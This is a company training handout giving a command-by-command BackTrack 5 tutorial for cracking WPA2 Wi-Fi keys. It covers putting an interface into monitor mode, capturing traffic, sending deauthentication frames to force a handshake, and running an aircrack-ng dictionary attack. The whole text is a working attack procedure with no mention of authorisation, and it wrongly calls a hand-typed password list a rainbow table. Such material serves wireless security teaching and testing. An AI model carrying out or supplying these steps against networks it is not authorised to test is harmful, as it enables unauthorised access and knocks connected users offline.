WPA2 cracking using backtrack 5 Tutorial

Start backtrack 5
Create pwd.txt file
In that file enter the possible passwords(manually) using the technique Rainbow table
Open the console in backtrack 5

Type the following commands in console

To check the WiFi connectivity Command - dhclient

1> airmon-ng
This commands states used interface,chipset and driver

2> airmon-ng start wlan0

start : to enable
wlan0 : name of the interface(which you have got from previous command)

This commands enables interface in monitor mode

Here monitor mode interface is mon0

3> airodump-ng mon0

This commands give you bssid , channel number of your WiFi network
Copy the obtained bssid of your network and note down its corresponding channel
number for further use

4> airodump-ng -c channel_num -w hacked --bssid bssid(paste the bssid which you have got)
mon0
(hacked file is created automatically do not create it manually)

Through this command packet is captured .

Now open a new console without closing previous one

Type following commands in new console

5> aireplay-ng -0 0 -a bssid_num(paste the bssid) -c station_num(get it from previous console) mon0

Through this command authentication will take place and then wait for WPA handshake, to

Wegilant Net Solutions Pvt. Ltd. 1 Website: www.wegilant.com

A3, Daffodil Building Email: info@wegilant.com
Hiranandani Gardens, Powai Landline: 022-40384200
Mumbai 76
 confirm that WPA handshake has taken place refer previous console where you have got bssid
number.
Here WPA handshake will be displayed if not wait for some time.

*** For WPA handshake to take place its very necessary that another pc or user should be
browsing interin same WiFi network***

After WPA handshake type following commands in console :

6> #aircrack-ng -b bssid_num hacked-01.cap

Using this command hacked-01.cap will be opened and it will ask to specify dictionary.(Create
a dictionary for demo with a few passwords at /pentest/passwords/passwords.lst) or create a pwd.txt
with a few passwords.

7> aircrack-ng hacked-01.cap

Using this command packets are read and bssid , essid and Encryption pattern of packets are
displayed.

8> aircrack-ng -b bssid_num -w pwd.txt hacked-01.cap

After this command the process starts which states how many keys are tested and find
current passphrase/key and the process stops after the correct WPA key is found.

Wegilant Net Solutions Pvt. Ltd. 2 Website: www.wegilant.com

A3, Daffodil Building Email: info@wegilant.com
Hiranandani Gardens, Powai Landline: 022-40384200
Mumbai 76